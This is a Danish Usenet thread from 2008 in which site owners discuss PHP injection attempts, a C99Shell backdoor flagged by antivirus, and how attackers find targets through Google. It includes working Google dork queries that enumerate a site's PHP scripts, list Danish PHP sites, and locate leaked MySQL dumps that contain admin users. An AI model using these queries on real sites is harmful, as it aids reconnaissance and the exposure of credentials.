Besøg http://voip-user.dk for debat om ip-telefoni og udstyr.

---

On Tue, 2008-01-01 at 11:22 +0100, Jens G wrote:
> >Hvilken risiko?
>
> Når antivirus kommer og siger der er noget skidt, så tror jeg da på
> det.

Hvad fortæller den?

> Og så forestiller jeg mig at der også kan være skidt som ikke er i mit
> antivirusprograms base endnu.

Antivirus har også falske positiver.

Tør du besøge http://www.eicar.org/download/eicar.com ?

> >> >Det tror jeg ikke, det er nemmere blot at bruge google.
> >> >
> >> MÃ¥ske. Jeg ved det ikke.
> >
> >Andre eksempler på at google kan bruges til at søge efter sårbarheder:
> >
> > http://johnny.ihackstuff.com/ghdb.php
>
> En ret god samling af sårbarheder, må man sige.

Er det ikke "dejligt" nemt?

---

On Tue, 01 Jan 2008 13:24:09 +0100, "Christian E. Lysel"
<christian@example.net> wrote:

>
>On Tue, 2008-01-01 at 11:22 +0100, Jens G wrote:
>> >Hvilken risiko?
>>
>> Når antivirus kommer og siger der er noget skidt, så tror jeg da på
>> det.
>
>Hvad fortæller den?

F.eks. detected: Trojan program Backdoor.PHP.C99Shell.d

Det er muligt den skal eksekveres af php, men jeg ved det ikke.
>
>> Og så forestiller jeg mig at der også kan være skidt som ikke er i mit
>> antivirusprograms base endnu.
>
>Antivirus har også falske positiver.
>
>Tør du besøge http://www.eicar.org/download/eicar.com ?

Jada. Lige præcist den tør jeg godt besøge.
>
>> >> >Det tror jeg ikke, det er nemmere blot at bruge google.
>> >> >
>> >> Måske. Jeg ved det ikke.
>> >
>> >Andre eksempler på at google kan bruges til at søge efter sårbarheder:
>> >
>> > http://johnny.ihackstuff.com/ghdb.php
>>
>> En ret god samling af sårbarheder, må man sige.
>
>Er det ikke "dejligt" nemt?
>
Alt for nemt.

--
Jens G
Kan anbefale http://www.everlove.dk til IP telefoni.
Besøg http://voip-user.dk for debat om ip-telefoni og udstyr.

---

On Tue, 2008-01-01 at 01:30 +0100, Kim Ludvigsen wrote:
> På et af mine sites, prøver de således
> at køre index.php?side=script, mens de på et andet prøver at køre
> ordforklaring.php?forklaring=script.

Selvfølgelig, angrebene skal da målrettes ellers har de ingen effekt.

Strategien kan lægges uden at besøge din side, vha. af google.

Fx giver http://www.google.com/search?q=site:ordforklaring.dk et fint
indblik i hvilke scripts du har og hvilke argumenter de skal kaldes med.

Eller mere specifikt:

http://www.google.com/search?q=site:ordforklaring.dk+inurl:.php&filter=0

---

On Tue, 2008-01-01 at 15:41 +0100, Kim Ludvigsen wrote:
> Hvis de bruger Google, må de vel næsten have en domæneliste at gå ud
> fra. Jeg tvivler på, at de manuelt eller med et script vil falde over et
> domæne som ordforklaring.dk.

Endnu en gang kan man bruge google til at finde php sites:

http://www.google.com/search?q=filetype:php

Skal man gå målrettet efter danske sites kan følgende bruges

http://www.google.com/search?q=filetype%3Aphp+site%3Adk


Et fint eksempel på hvad google kan bruges til kan du se på
http://johnny.ihackstuff.com/ghdb.php


Fx, lad os finde mysql datavase dump, der indeholder en tabel users med
en bruger kaldet admin:

http://www.google.com/search?q=INSERT+INTO+users+VALUES++admin+%22%23
+Dumping+data+for+table%22

---

On Tue, 2008-01-01 at 16:45 +0100, Kim Ludvigsen wrote:
> Jo, men den giver trods alt over 300 millioner sider, og selv hvis man
> begrænser til danske sider, hvilket en international hacker vel ikke har
> nogen speciel grund til, får man knap 600.000 sider. Men ok, de kan jo
> bare starte fra en ende af.

http://da.wikipedia.org/wiki/Muhammed-tegningerne ?


> > Et fint eksempel på hvad google kan bruges til kan du se på
> > http://johnny.ihackstuff.com/ghdb.php
>
> Var der for øvrigt ikke noget om at Google for nogle år siden
> stoppede/forsøgte at stoppe søgning efter visse sårbarheder?

Der var en sag, hvor google ikke måtte linke til noget sites. I stedet
linkede de til dommerkendelsen hvor linkene stod.